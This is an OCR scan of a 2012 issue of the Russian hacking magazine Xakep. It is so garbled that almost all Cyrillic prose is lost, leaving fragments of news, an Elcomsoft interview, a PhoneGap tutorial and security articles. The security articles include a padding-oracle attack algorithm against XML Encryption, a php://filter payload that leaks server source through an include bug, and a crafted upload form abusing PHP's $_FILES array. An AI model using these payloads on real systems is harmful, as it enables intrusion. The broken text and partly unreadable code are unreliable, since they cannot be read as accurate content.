Upload
alexey-a
View
298
Download
2
Embed Size (px)
DESCRIPTION
Xakep journal
Citation preview
Fl 01 [156] 2012
ENCRYPTION XML-KOHTEHTA .
,
--
--PHONEGAP:
HTML5
--
ANDROID
:230.
www.epidemz.net
lntro
: , . , :
100%. , 250 ,
. ? , , :
, . - .
. : 1-3 , - . ,
: >> , . ,
. , nn, , - .
, . , : . , , , .
n : 115 !
shop.g lc. ru/ xakep. , , -
. : !
01/156/201 2
nikitozz, rn. . shop.glc.ru/xakep
vkontakte ru/xakep mag
PC_ZONE UNIS
nikitozz )) [nikitozfareal.xakep.rul ctstep (steprareaJ. xakep.ru )
c(gorl ([email protected])
Step)) [stepffireal.xakep.rul (magglareal.xakep. ru l
MALWARE SYN/ACK UNIXOID
. Klouniz (alexanderfareal xakep.rul ccdushock>> (adushockfareal.xakep.u )
R- xakep.ru
DVD Ui- Security-pae
ART
ccgol)) (golumfaeal.xakep.u 1 (pofakumekay.com) [ g igorievafaglc . ru ) ixafaeal . xakep. ru l
ant)) (antfareal.xakep.u l ccAd ushock andrushockfareal.xake .ru) 01g1 >> levdokimovdsfagmail.com)
(aliklaglc. rul
-
: . : .
PUBLISHING 000 , 115280, , . , 19, n, 5 , No 21. .: 1495/935-7034, : 1495/545-0906
no
-
. : 1495/935-7034, : 1495/545-0906
n TECHNOLOGY
-
( f il atovacl glc ru l (olgaemlfaglc.ru) /alekhinalaglc.rul
([email protected] ( ] (ta tarekova@g lc .ru l /gospodinovataglc u l ([email protected]/ (bulanovalaglc.rul
/korenfeldlaglc.rul
l koshelevafaglc . u ) [email protected]]
llukichevafaglc.ru )
: V- : claimfaqlc.ru . n : (495)545-09-06 nn : 1495/663-82-77 : 8-800-200-3-999 : 101000, , , / 652,
, 77-11802 14.02.2002 n Zapolex, . 219 833 .
. n . , n , . . - n. : contentrglc.ru . 000 , , 2012
HEADER 004
011
MEGANEWS hacker tweets -
COVERSTORY
018 L Encryption
L
016
017
OMOHKASIRI
004
8 Dropbox AdWords Proof-of-cocept SS- 100
COVERSTORY
030
COVERSTORY
,
Adobe
036
042
046
PCZONE hnG:nL5
Windows-apoe
Widows-cce
Widws-?
- 050 Easy-Hack
054
060
064
068
072
D5
- SpyEye Lotus, Lotus Oomio tll X-Tools
074 --
- MALWARE 080
084
Wi32/0uqu: Stuxet
: bootkit test BitDefede, ESET NOD32, F-Secue, Outpost Secuity, Risig >>
- 088 .N-
.NET Famewok
094 ,
098 -
- UNIXOID 102
107
112
117
Linux ! tcpdump
did-
- Ubuntu 11.10 Oneiic Ocelot
- SYN/ACK 118
122
- FERRUM 126 NAS
130
-132
-136
139
142
144
5- 6- NS- Silicon
PoweSP060GBSSOV30525
PHREAKING Loop
, n n n
FAOUNIED
FAQ 8.5 WWW2 w-
2012 NY2k+ 12
EGANEWS SIRI
OMOHKASIRI
111 '.1 ~.)
" On 19 rem1nd me l 's dad's b
ltel 11 11 -11 11 11 11 , . ltel 2011 . . ltel, ltel , ltel . . * .
MEGAN EWS & F , 600 .
POLAROID !
2008 n Polaoid ,
w 11- . ,
Polaoid
n , 11-
n n .
Polaroid : Z340 lnstant Digital Camera. ZINK
Zero lnk Printing, n n . ,
n >> , . n, . , , n ,nn
n . 14 Mn. n 2, 7"
SD. I 43 ] F/3,2. [ -1280 720 n]. Polaroid Z340 n 76 102 , $20 30 . - ,
, no , 25 n. n , Polaroid. Z340 lnstant Digital Camera $300.
AVIRA AESCRIPT.DLL 006
DNS ,
, DNS-apeco.
, , -
n. DNS - Hotmail, Gmail, Google, Microsoft
, Uol, Terra Globo. , , , google.com ,
I- Google, -. n
. n, Google n
n Google Defender, n .
, , 27- n ,
n DNS-cepepax , DNS-.
, , n Ghost Click .
-
, n DNS Changer. OS Windowsoep DNS. I- n 15 ! ,
, n . 100 , n 500 n .
[ n], n
MEGANEWS , CONSUMERIST, RIAA .
! , WI-FI,
, , , . , , . -, ,
10 , /GS. ,
, , , , 802.11 .
-, . , ,
, [ 100 ), 802 .1 1, .
, . , ,
. , - , - .
. , - , .
iPhone45,
,
, . Apple n
- :).
WEXLER.BOOK 7001. Wexler WLR. 7001 7.0" , . 4
( 32 microSDI , , ; F. -
1500 mAh, , . ,
. WEXLER.BOOK 7001 . : 5 990 .
. , 1.6.4. . ,
, . , ,
. , , ,
. , CMS,
, . , 1.6.4, 6 , . ,
. . , .
[CDN) .
Firefox with Bing
ing
MEGANEWS ENTENSYS COMMTOUCH , 6, 7% n .
,
>> .
YouTube : Aoymous [Zetasl . , >> , , >> , . , 26 2011
- - . , - .
-. Anonymous , - ,
. , , , -
>> , , . , OpCatel [n
~. , , , , .
, , - , OpCatel .
. . , ,
, , . . .onion- Hidden Wiki,
. , . - , Feedom Host ing. ...
: Feedom Hosting, 40 ,
:
Lolita City - , 100 . Feedom Hosting, , >>. Opeat io n Daknet
S- . , Lol ita City SQL- . , , ~ .
n: pastebin . com/1 LH nzEW.
n Anonymous n
. n , ,
- 2000-6000 . 38
.
laEdiStrosar: , >> [ l.
cljkouns: . Ggl-- .
I-: http:!/4 .. 2; http:/196.4; ht.p://71.3; ht.~. ...
ciRogunix: DS/- ICMP efCount TCP/IP [MS11-083I 232 UD-, , 250 52. t.co/aY.PCMyRy.
lafjserna: Micosoft/MSRC . ! Google. ++.
, , , . !
.
laiLLUMINATI: ,
.
ciWeldPond: Google,
OllyDbg IDA _noRE.exe
.
, Google Wi-Fi, _nomap. :1
clinsitOr: Oday BIND.
: DNS-cepepa BIND, DoS Oday.
Shodan , Siemens Simatic.
t.J;o 1l1Q0b3cq.
1!!!1 : lilil . SCADA-
. S- - .
clmikko: -
, :
MEGANEWS ( 926 ), , . .
! ,
[Figure: map showing the location of infected computers]
Nito, ,
.
.
Stuxnet, , - , n , n . , , Symantec. ,
Nito, n , . 29 19 , [,
]. n , n. - , .
[ Poisonlvy]. , . Symantec ,
. Nito : , .
& . ,
.
& BSUP a . ,
MAIL.RU GRU , Twitter. , .
HAANDROID'E
FXI , The Cotton Candy
$200, n 2012 . ,
cWindows 8
.
FXI . The Cotton Candy [ - , 21 , , ! . U5-,
. R- 5amsung Exynos 1,2 [ , 5amsung Gala xy 5111.
Mal i-400 , micro5D [ 64 I , Wi-Fi Bluetooth, HDMI2 .1 U5B 2.0. ,
n 1 . h Cotton Candy Android 2.3. , , , Android.
. HDMI, U5B [ n !. Bluetooth , .
Android Market, .
, GOOGLE ?
SSID ,
GOOGLE 01 /156/2012
BITCOIN , BITCOIN
n BitCoin n .
, , . ,
n Mt Gox, BitCoin, , . , BitCoin , , , n
.
lntego, ,
Devii Robber, BitCoin . . ,
, , , , Bi tCoin, , . DeviiRobber 05 ,
n . The Pirate . ,
Graphic Converter 05 . n ,
. , Devii Robber itin - , .
. Devii Robberae , 5afari Vidalia- Firefox, TOR. , D evii Robberoapye
, , . BitCoin . Oper
Microsoft n ,
. , BitCoin.
: 1 n 2, , 50 , 1 .
, n , . ,
, n , Bi tCoi n. - .
n ,
. , . , .
, BitCoin, :
n , , - >>.
MEGANEWS LINUX3.1, kl .g .
CTAHAADOBE FLEX FLASH
d Flash n 750 ( 7
% n!
n .
dobe n n n Fla sh l . Fla sh n n , n n Adobe Al R n n.nn n Android PlayBook, n
n . Flash Player n n n HTML5. n n , n n Flash. , , n Apple, , n-n
n Flash Pl ayer iOS. , Flash Playe r n Apple iOS
,- n . Adobe Fl ash n - >> Apple. , n Flex SDK. Flex 4.6 SDK, 29 , n n source.
, , ,
, , n . , , , n . iSpy n 100%. , , n
iPhone ndid n
[magnified keysl. iSpy n n, n,
n n - ! , .
n , 60 . n n 90% . n , n . n , , n n . n DSLR-aep n n 12 . iSpy
magnifi ed key n - .
. DARPA Shdd Challenge
. , .
50 .
AMAZON .
, 2012 .
GGL
42 47 .
500 Wikimedia.
IPHONE ~~>>
. ",--"
iPhone Dev-Team n iPhone4S.
, .
n, , .
iPhone 45 ,
. Chonic DevTeam - iPhone . , , ,
iPhone, & , .
, , , , iPhoe 45, iPhoe
: iPhone 4 iPhone 3G5, . , ,
>> . , , . : 51 - & , , ,
. & ! >>, >>, , l.
, - youtu.be/gofpeiTXI5U. :
& 1611) ; ; 51 - & T-Mobile; , Wi-Fi !
, );
, iPhoe ; ; EDGE ;
20-30 ; iPhoe, ;
MCAFEE:
space
, >; 51 -, ;
51 - T-Moile . . ,
iPhoe T-Moile, .
.HEADER
Proof-of-Concept SS-
100
, . , SQL-, , , . , ,- sql-map, SQLi
. , SS- . - . Damn Small XSS Scanne [DSXS).
XSS . Coss-site scipting [XSS]- n , n
n JS-. n . SS- n
. - , , n, n -.
n- n. n n
, SS-.
n XSS zero.webappsecurity.com
SS- - n. n- n , n
-n n . n
n L- n GET/POST-anpoca .
[ ] , n .
, n, n SS-n. , -n
. ,
n . n,
L- .. [ n ] ,
n JavaScipt-o. , n, n L- ,
> n n JS-, ... .
DSXS , n SS .
? n Python,
GET- S- SS-,
. Damn Small XSS Scanne [DSXS]
, -, .
, ,
n . n , , n , ,
> - . DSXS ,
. -, DSXS , . n, . n [
, n n], . ,
n. , , n n
Use-Agent, Rf Cookie - . n GitHub [https:Ugithub.com/ stampam/DSXS ]. ::
HEADER
10 DROPBOX ADWORDS 10 2 D , , , . 2 ,
50 , . - $99,00 . , , - 250 . , 1 , ,
- . , , D,
-. , , [, it . ly/ud69i ]. ,
, D - - , , . , , 10 , D
. AdWods !
? , [ it.ly/xNKyB ]. , D- .
, . ? , ,
. - . , AdWods, . ?,,- . , ! , Google, 1000 . . . Qit. l y/AEsg1 $75 AdWods, ,
.: ] , e-mail [ - ], [ - about.me], . e-mail.
[ ] .
? ? , ,- Google AdWods [adwods.google.com ].
-7 >> . [ , , ],
. [ ] : 1. . 2. [, D]. 3. ,
[, , , , ].
3. >> : , 600 .
. >> ,
. : d, f oline stoage, online backup f, online backup, online backup data, d space.
, - , Google.
URL , D Refeall Status [, httR:Udb.tt/UfxuFBm ]. , .
, , . ,
. , [Cost-Pe-Ciick].
, . -
, , . :] ? - ,
D. -, . -, AdWods, , , [ Google]. . :] :::
Updated Statu.s
3/ 26/ 2011 7:4 5 Joined
3/26/ 2011 6:52 .. Completed
3/ 26/ 2011 6:37 , Joined 3/ 26/2011 6 :08 Joined
3/ 26/2011 5:23 Completed
3/26/ 2011 5:14 Completed
3/ 26/2011 4:49 Completed
3/ 26/2011 4:32 Completed
- 250 Dropbox
COVERSTORY
=
BEAST Padding Oracle Attack .NET Framework,
XML Encryption,
L-.
.
www.w3.org/TR/xmlenc-core/ - the XML Encryption specification
w .
bit l/ur , XML Encryption.
lplaintextl llirstfaplaintext .su, www.plaintext.sul
XML ENCRYPTION. XML Encryption, a W3C standard from 2002,
is implemented in XML frameworks such as .NET, Apache Axis2, JBoss and others,
by vendors including Microsoft and Red Hat. XML Encryption
L- ,- , L-- . n , n
. , AES DES . n n AES [ nn, - CBCI.
ISJ*iiirIId , n [ 16 , 128 ! . ,
, .
n ~ . IIVI, XOR,
. , :
    // encryption
    C[0] = AES_ENC(k, IV xor M[0]);
    C[i] = AES_ENC(k, C[i-1] xor M[i]);
    // decryption
    M[0] = AES_DEC(k, C[0]) xor IV;
    M[i] = AES_DEC(k, C[i]) xor C[i-1];
where k is the key, M is the plaintext, C is the ciphertext and IV is the initialization vector.
n . .
, , : ,
. , , 12
Dx05. ! 16 !, , 15
, 16- 10.
, XM L Encyptio.
! !
XML Encryption
IV1[0]
, BEAST, Padding Oracle Attack. -
. . , , n XOR IV MSK, IIV MSK, C[DJI [) MSK. , .
, MSK, n , . ,
. , , . XML Encyptio , .
, , , ASC II . ASCI I . , NULL ! Al,
! Bl. , , , >>. ,
, n . ,
, 16 , tue, [) = AES_DEC_ CBC[k, IIV, C[OJII NULL, false -
. , , .
: 1. IV1,
[I V1, C[O] I . niV, lniV, C[O]I . tu, IV1 = iV, false .
COVERSTORY
WS-SECURITY
WS-Security is an extension of SOAP for
-. WS-Security uses XML Encryption and XML Signature.
, 2-3 , , , .
2. [, AES_DEC , ! . :
    msk = 0
    repeat
        msk++
        IV2 = IV1 xor ( 0...0 || msk || 0...0 )   // msk placed at byte position j
    until Server((IV2, C[0])) == true
    return X[j] = ASCIICode(NULL) xor IV2[j]
Input: C = (IV1, C[0]), a single-block ciphertext
Output: the j-th byte X[j] of AES_DEC(k, C[0])
. j- , , j- . , ? : . [
!:
    AES_DEC_CBC(k, (IV2, C[0])) = IV2 xor AES_DEC(k, C[0])
,
I . [] ,
[0]. XOR [] IV.
. .
XML XML ENCRYPTION Extesie Makup Laguage [ XM LI . XML ,
[odel. , , XML < >
. & s- & >>. XML XML ti.
W XML Sigatue W XML ti, XM L [
, . .l XML.
XML ti, . , ,
[ , , . . l . , , , .
. . ,
, . .
John Smith l
A123456 ...
XML Encryption
n n , . n n n,
n L- . , L-, . ?:-]
XM L ti n n L- ! XML], n . n n . n td Element -, L-
. Encypted Content , n
, , . . n Encypted Text Contet, n Encypted Contet, , . , n n
. , n XM L Famewok'o n n .
- . XM L E cyption n n
UTF-8, n , n
. n UTF-8- , , lline feed ]
lcaiage tu]. , n ASCII n UTF-8.
n, ASCII n n 128 ! 4]. ,
, .
n n -. nn Apache Axis2 Famewok, Rampat WS-Secu ity. n XML Encyption XML Signatue SOAP.
n Axis2 Famewok, n lmessage flow]. lmessage flow]- n , S- ! ],
n n. S- n, n Message
Receive, , , Sevice n .
Axis2 : st, Secuity Dispatch. Secuity,
XM L SIGNATURE
XML Signature is a W3C standard for signing XML.
XM L Encyption
?
v Secuity, . , , , . . ,
!, , -, , . ). -,
, , . Axis2,
,- -. Paddig Oracle Attack,
l-, ASP.NET), .net.
, . , XML S-.
Dispatch. Message Receive, message flow SOAP n , .
, Axis2 . :-]
AXIS2 - , Axis2. ,
, tue false
. n secuity fault. secuity fault : 1.
. , , , ? , n 001 OxlO, n n .
2. . n>> , ASCII Oxl F ! 09, , D- , ].
- L- , & IOx26] > > .
.
n , ASCII ! ]. n n XML n >> >,
.
COVERSTORY
. , , , ,
, 16- , tue false. ,
Block   Dec     Hex         Characters
0       0-15    0x00-0x0F   NUL SOH STX ETX EOT ENQ ACK BEL BS TAB LF VT FF CR SO SI
1       16-31   0x10-0x1F   DLE DC1 DC2 DC3 DC4 NAK SYN ETB CAN EM SUB ESC FS GS RS US
2       32-47   0x20-0x2F   SPC ! " # $ % & ' ( ) * + , - . /
3       48-63   0x30-0x3F   0 1 2 3 4 5 6 7 8 9 : ; < = > ?
ASCII table, blocks 0-3 (each block is 16 characters with the same high nibble)
, . [ ,
] [ ]. , , XML 5chem'
[L-] . , ,
, , , . ,
, .
[ . ], u .
~ , ,
XML 5ignatue. , n XML 5ignatue Wappig, , n
nn / . n- , n n .
XML Encryption
Block   Dec       Hex         Characters
4       64-79     0x40-0x4F   @ A B C D E F G H I J K L M N O
5       80-95     0x50-0x5F   P Q R S T U V W X Y Z [ \ ] ^ _
6       96-111    0x60-0x6F   ` a b c d e f g h i j k l m n o
7       112-127   0x70-0x7F   p q r s t u v w x y z { | } ~ DEL
ASCII table, blocks 4-7
. - , n -, -, n . n -, ,
n. , , ,-
, , (e.g. ISO/IEC 19772:2009), authenticated encryption
in XML Encryption . , , OSI (e.g. XML Encryption over SSL/TLS, layer 5).
, , , , epic fail . XML Encryption has a side-channel, . , , - , . The attack was found by Juraj Somorovsky and Tibor Jager, . ::
.
fopen, , file_get_ contents . .
, ,
.
PrOxor [php.m4sqllagmail.com, rdot.org/foruml
$ FILES
, .
'-"
1 il. ly/sfDcys
noce L ightig Template.
blt.ly/ttvWV -n Lightning-Template.
it.!y/mdrdqfca,
File path injection. pastebln.com/1edSuSVN - n
File path injection.
it . ly/g6ztD- ,
$_FILES.
n
n .
, , 4.3 . [
, . . l > . .
, , . , :
    print_r(stream_get_filters());
, . steam _filter_append/
stream_filter_prepend; the php://filter wrapper. , , . :
    $fp = fopen('php://output', 'w');
    stream_filter_append($fp, 'convert.quoted-printable-encode');
    fwrite($fp, "I \v Love \v PHP.\n");
, POST, Base64 :
    readfile("php://filter/read=convert.base64-encode/resource=php://input");
, , . , ft-, gz-, :
    copy('compress.zlib://ftp://user:pass@host:21/path/file.dat.gz', '/local/<dir>/of/file.dat');
php://filte - . ,
    include($_POST['inc']);
with «allow_url_include = Off», so RFI is ruled out.
-- S- :
    inc=php://filter/read%3Dconvert.base64-encode/resource%3D/path/script.php
, - . !
~ , , , . - . ,
12. . , filte ! ] .
, . $this-> _data >> :
    private $_data;
    while ($bucket = stream_bucket_make_writeable($in)) {
        $this->_data .= $bucket->data;
        $this->bucket = $bucket;
        $consumed = 0;
    }
, when $closing is TRUE:
    if ($closing) {
        $consumed += strlen($this->_data);
        $str = nl2br($this->_data);
        $this->bucket->data = $str;
        $this->bucket->datalen = strlen($this->_data);
i Secure [9ist.github.com/600388/cd99ae03c3
sample.html:
    {{ title }}
    {{ title }} || {{ name }} | {{ message }}
    Items: {% for item in items %}{% if item %}{{ item }}{% endif %}{% endfor %}

sample.php:
    <?php
    require_once 'LightningTemplate.php';
    $items = array('hoge', null, 'fuga', ..., 'piyo', ...);   // two elements unreadable in the scan
    $lt = new LightningTemplate('sample.html');
    $lt->title = 'Sample Template';
    $lt->name = 'World';
    $lt->message = 'hi!';
    $lt->items = $items;
    echo $lt;

sample_cache.php:
    <?php
    require_once 'LightningTemplate.php';
    $items = array('hoge', null, 'fuga', ..., 'piyo', ...);   // two elements unreadable in the scan
    $lt = new LightningTemplate('sample.html', new LightningTemplateCache_File('./cache'));
    $lt->title = 'Sample Template';
    $lt->name = 'World';
    $lt->message = 'hi!';
    $lt->items = $items;
[Figure: Lightning Template sample files]
COVERSTORY
    }
    if (!empty($this->bucket->data))
        stream_bucket_append($out, $this->bucket);
    return PSFS_PASS_ON;
, PSFS_PASS_ON. ,
. . :
    stream_filter_register('convert.nl2br_string', 'nl2br_filter');
, .
, ,
, . Google Code Search for stream_filter_register.
Lighting-Temp l ate ! !, . , sample.html:
    {{ title }}
    class nl2br_filter extends php_user_filter {
        private $_data;
        /* called once when the filter is created */
        function onCreate() {
            $this->_data = '';
            return true;
        }
        /* called for each chunk of data passing through the stream */
        public function filter($in, $out, &$consumed, $closing) {
            /* collect all incoming buckets into '$_data';
               nothing is passed on until the stream closes */
            while ($bucket = stream_bucket_make_writeable($in)) {
                $this->_data .= $bucket->data;
                $this->bucket = $bucket;
                $consumed = 0;
            }
            /* on the last call transform the collected data
               and hand it to the output bucket brigade */
            if ($closing) {
                $consumed += strlen($this->_data);
                $str = nl2br($this->_data);
                $this->bucket->data = $str;
                $this->bucket->datalen = strlen($this->_data);
                if (!empty($this->bucket->data))
                    stream_bucket_append($out, $this->bucket);
                return PSFS_PASS_ON;
            }
            /* not closing yet: ask for more data (missing from the scanned listing) */
            return PSFS_FEED_ME;
        }
    }
    include("./LightningTemplate.php");
    $lt = new LightningTemplate('./sample.html');
    $lt->title = 'Title';
    echo $lt;
L-:
< head> My Title
, L- . , include,
. , - , . ,
, L-. :
    public function filter($in, $out, &$consumed, $closing) {
        while ($bucket = stream_bucket_make_writeable($in)) {
            $patterns = array(
                '/\{%\s+if\s+(.+?)\s+%\}/e',   // note the /e (eval) modifier
            );
            $replacements = array(
                '"..."',                        // replacement string unreadable in the scan
            );
            $bucket->data = preg_replace($patterns, $replacements, $bucket->data);
- php_user_filter. Its methods: filter, onCreate, onClose. The parameters of filter: 1. $in - , ,
.
- , phpseUm44, hello.txt.
, !
). $_FILES :
    Array
    (
        [uploadfile] => Array
            (
                [name] => hello.txt
                [type] => text/plain
                [tmp_name] => /tmp/phpseUm44
                [error] => 0
                [size] => 33
            )
    )
, $_FILES[uploadfile][type] is taken from the Content-Type of the request, . , -,
, :
    $_FILES["file"]["type"] == "image/gif"
, , . getimagesizel). , , , IF-
, . , . , - pic.php.myext -. , - , . , $_FILES.
, ,- . bugs . php.et ,
, - . :) ,
/ , $_FILES[uploadfile] [name] . , , -. Uni-
COVERSTORY
- . Windows-aax n . .
. $_FILES. Qwaza d ot.og . BlackFan, , , . . , ,
:
    foreach ($_FILES["file"]["tmp_name"] as $key => $name) {
        echo "Size:" . $_FILES["file"]["size"][$key] . "<br/>\r\n";
        echo "tmp name: " . $_FILES["file"]["tmp_name"][$key] . "<br/>\r\n";
        if ($_FILES["file"]["size"][$key] > 0 && $_FILES["file"]["size"][$key] ... (rest unreadable in the scan)
[Figure: the onCreate() method of a user stream filter]
    <form action="upload.php" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="MAX_FILE_SIZE" value="10000000">
    <input type="file" name="file[size][">
    <input type="submit" value="submit">
    </form>
- $_FILES :
    $_FILES["file"]["tmp_name"]["[name"]
n :
    $_FILES["file"]["tmp_name"][$key]
, $_FILES ( , ) . , .
( upload.php), L-, secet. php, , upload .php,
: 1. secret.php,
(, , ). 2. , .
0
. , , .
, imageceatefom* ,
, l , .,
, . , base64_ecode , , , :
    $jpegimage = imagecreatefromjpeg("data://image/jpeg;base64," .
        base64_encode($imagedata /* raw JPEG bytes fetched from the database */));
    imagejpeg($jpegimage);
, , .
, ,
. , , .
, -, , , , imageceatefom*/image*, :
    foreach ($_FILES["file"]["tmp_name"] as $key => $name) {
        echo "Size:" . $_FILES["file"]["size"][$key] . "\r\n";
        echo "tmp name:" . $_FILES["file"]["tmp_name"][$key] . "\r\n";
        $img = imagecreatefromjpeg($_FILES["file"]["tmp_name"][$key]);
        imagejpeg($img, './new_' . $key ... (rest cut off in the scan)
    }
COVERSTORY
S, I
& - . . n
- - - : n: ~~ n.
0 .
E\comsoft. ona:~vanced eBook ss, n_~1 , - Defcon.
r.t - .... , IT, , ?
il ! ~ . .- . ][J,
, 6. - 100 . . 20 . . ,
- ... , , - , . -
. . , - ,
. , , - ...
COVERSTORY , , . , , , : . , , . - , . , , ,
, .
?
1 ~ ,
- ,
. . , . , ,
[ 97- ! . , , ,
IT. . , , , 80 %.
Elcomsoft, . , , , , . : .
. n
, ... .
r.1 .:;.t ELCOMSOF
?
l , ~
. passwod v, , . , , . .
, . , EFS
Recovey . - , Active diectoy.
compute foesics . , ,
, .
, , , -
. , Defco 2001
, - . - , - . - .
, . , . , , ,
, .
.
, , ELCOMSOFT.
1 . ~ Access, . ,
... . , , . - , -
. :1
1 , ~ ,
. - , , . 90-
- , . Elcomsoft, . .
r,1 , .
1 , , , ... ~ ,
Apple, iOS [ , iPhoe 45 iPad21. , . , ,
. , ,
.
r.1 APPLE .:;.t ,
, ? ADOBE .
l , ~ ,
compute foesics. , , . , ... Apple , . , , .
r.1 ... PDF
ELCOMSOF ... ?
l , pdf . ~
. : >.
- . , .
r.1 .:;.t ADVANCED PROCESSOR, - 2001 DEFCON?
l , . , ~ ,
df-, . 2001 .
,
, . , , . . Defco. , ,
12 20 . , , , Adobe.
. Defco , Advaced eBook ss,
. , , ,
.
m ? :1 01 /156/2012
l , ... , ~
, . - Spot the fed ! ).
!, ),
, , - .
, , , - ,
. . , , , ,
, .
r.1 , . 1.;.1
, , .
l ~ ~ ,
, , . , , . ,
, , . .
. -.
. , ,
. : ,
. -,
11 . . , - ,
, , , , . . , , . :
. , , .
. , .
- , . , , , , , .
- .
r.1 , 1.;.1 ? ?
l _ . ~ ,
, 21 . , .
, . 11 -, ,
. , . - , , , ... ,
. :) , , - .
, . , , . - . , - .. .
, .
r.1 , 1.;.1 ADOBE
?
l , , -, ~ Adobe
. - ,
Adobe, . Adobe , , . , : . ,
.
, , ?
, , Elcomsoft. ,
COVERSTORY , .
, , , , , . ,
. , n
.
r.1 ... ?
l , l -) ~ 50
, Elcomsoft. , , , .
, . , . , , . .
, , - , . . ,
2001 , 6 , 2002
. , ! ), : , , , . depositio
! ) - . , : - ?>>. , : .
, Elcomsoft
. . 2001 , .
r.1 , , ... 2002.
?
l Elcomsoft ~ ,
Puic lteest l. , , 17
Elcomsoft . . , ,
. .
,
? , , - ?
l . ~ .
, .
, - , . , .
, , .
r.1 ~- ... , ?
?
l , ~
. . - .
r.1 , ...
. ?
l , ... ~ . ,
. , , -
, .
?
- , . , , ...
, , , . ,
, ,
. 9 .
r.1 CONFIOENCE 2.0 ...
CANON. ?
l , ~ I) .
- , 3000, ,
, 3500. , n
, , , ,
. n 300,
. , .
n. , Magic Laten, Canon , . Hackes Oevelopes Kit, , >> >> .
, n , ,
. CONFidece 2.0. Niko . lus-) .
, , . , . Nikon .
r.1 5-10 ... ,
, ?
l , ~ , Pactical
cyptogaphy . , , , . ... , , . ,
. , . , , .
r.1 ... ?
, ?
l , . ~ ,
. - ,
. ,
. , . ,
, , , .
, 1 % , . , . , , IT,
- : n >>. , .
, , , . :::
Preview
11, n n n n
: n ~ n ~n ~ n . . n n . n n
n n, n n Lotus Domino Contolle n n .
n, n, n I .
PCZONE
36 HTML5
And oid iOS, ? n. n n n .
500 n, . n
n .
30 . .
? n n, n , n
n .
MALWARE
DUQU
n ,
n n n
Stuxnet.
? - .
, .
I! , MBR, n, 5 nn
.
PCZONE
PhoneGap:o HTML5
- , , .
todo list Adroid iOS, , .
Objective-C Java , , PhoneGap.
iOS
, Windows 8, , , , n n HTML5. , - , - , n n, . , n n n n HTML, JavaSc i pt
CSS!, PhoneGap. n n n n nn n: iOS, Andoid, Windows Phone, lk, WebOS, Symian Bada.
n n n [n, Objective-C iOS), API . , n n n,- HTML5 PhoneGap API. n L-, , ! API n n , n n n
: , n, [ ), n , , ! ), . . , - . n jQuey Moile Secha,
, [ n ) . n , n , n nn . - .
n iOS- -, AppStoe, n
:). : , , , , Andoid. , n ,
.
, . iOS .
. n n .
    <div data-role="page" data-dom-cache="true" class="page-map" id="index">
        <div data-role="header">
            <h1>…</h1>
            <a href="#points" class="ui-btn-right" id="menu-points" data-transition="pop">…</a>
        </div>
        <div data-role="content">
            <div id="map-canvas"><!-- the map is rendered here --></div>
        </div>
    </div>
data-dom-cache="true" , . data-transition="pop",
>. , jQuey Moi l e, [ it.ly/vtXXM I .
PHONEGAP
, PhoneGap
> . ! . PhoneGap Build [build .phonegap.com l n .
. , , .
- PhoneGap, . lgithub.com/ phonegap/phonegap-p luginsl,
iPhone, Android, Palm, Bla ckBerry. iOS 20 r: BarcodeScann er [ -!. AdPI-ugi [ iAdl, NativeCont rol s l iOS l .
PCZONE
n :
    <div data-role="page" data-dom-cache="true" class="page-points" id="points">
        <div data-role="header">
            <a href="#" data-theme="b" data-icon="delete" id="delete-all">…</a>
            <h1>…</h1>
            <a href="#index" class="ui-btn-right" data-transition="pop" data-direction="reverse">…</a>
        </div>
        <div data-role="content">
            <ul id="list" data-role="listview" data-inset="true" data-split-icon="delete"></ul>
        </div>
    </div>
The attributes data-transition="pop" and data-direction="reverse" set the page transition and its direction.
nn . , .
, API Google Maps, :
    var latlng = new gm.LatLng(this.options.lat, this.options.lng);
    this.map = new gm.Map(element, {
        zoom: this.options.zoom,           // zoom level
        center: latlng,                    // map center
        mapTypeId: gm.MapTypeId.ROADMAP,   // map type
        disableDoubleClickZoom: true,      // no zoom on double click
        disableDefaultUI: true             // hide the default controls
    });
Gm- n, Google Maps.
. - :
    this.person = new gm.Marker({
        map: this.map,
        icon: new gm.MarkerImage(PERSON_SPRITE_URL, new gm.Size(48, 48))
    });
PERSON_SPRITE_URL n n Ggl -. -maps.gstatic. com/mapfiles/c/mod scout/cb scout spite api OO . png .
, , n, , click:
    gm.event.addListener(this.map, 'click', function (event) {
        self.requestMessage(function (err, message) {   // ask the user for a message
            if (err) return;                            // dialog cancelled
            self.addPoint(event.latLng, self.options.radius, message);
            self.updatePointsList();                    // refresh the list of points
        });
    }, false);
[Figure: PhoneGap.plist - EnableViewportScale: Boolean NO; ExternalHosts: Array (4 items): csi.gstatic.com, .googleapis.com, maps.google.com, maps.gstatic.com; MediaPlaybackRequiresUserAction: Boolean NO]
n - . n n n
. nn Geolocation AP I !, n n l:
    if (navigator.geolocation) {
        function gpsSuccess(pos) {
            var lat, lng;
            if (pos.coords) {
                lat = pos.coords.latitude;
                lng = pos.coords.longitude;
            } else {
                lat = pos.latitude;
                lng = pos.longitude;
            }
            self.movePerson(new gm.LatLng(lat, lng));   // move the marker
        }
        window.setInterval(function () {
            // poll the current position
            navigator.geolocation.getCurrentPosition(gpsSuccess, $.noop, {
                enableHighAccuracy: true,
                maximumAge: 0
            });
        }, INTERVAL_MS /* value unreadable in the scan */);
    }
movePeson n n n getPointslnBoundsll n, n
- . n- n ? HTML5 n
locaiStoage, n !n , l. , n, , !
- , n n . n - n - Safai Chome. ,
n .
, n , , n WebKit . ~ n
n h ~ -n n -
iOS
. - (n Denwe XAMPPI, ,
. n , . , , n PhoneGap, , ,
. , i05-. , PhoneGap IDE .
n i05,
n 05 10.6+ ( 05 10.61, Xcode i05 50 . 50 , n Apple . Xcode i05 50 ldeve l ope. app l e . com/devcente/ i os/index.act i on l . ,
4 . , ' Apple ( n , 5t, !. ,
i05 Objective-C. PhoneGap,
PhoneGap i05. lhttps://g ithub .com/callback/phonegap/zipba ll /1.2 .01,
i05 . , Xcode PhoneGap. , IDE -
PhoneGap: HTML5
. , , n Run- iPhone/iPad PhoneGap. , index.html ,- . ,
n n, n www. ,
PCZONE
        if (button_id === 1) {   // the user confirmed
            self.removePoint(point);
        }
    }, TITLE);
, n,- , n i.i n . , n ln , l ,
Ph oneGap:
    navigator.geolocation.watchPosition(function (position) {
        self.movePerson(new gm.LatLng(position.coords.latitude, position.coords.longitude));
    }, function (error) {
        navigator.notification.alert('code: ' + error.code + '\nmessage: ' + error.message, $.noop, TITLE);
    }, { frequency: FREQUENCY_MS /* value unreadable in the scan */ });
- , . n Run
, n iS -' nn n .
iPhone, iPod iPad n, n Xcode. n nn n . :1. : n n
PhoneGap, n, n n . .
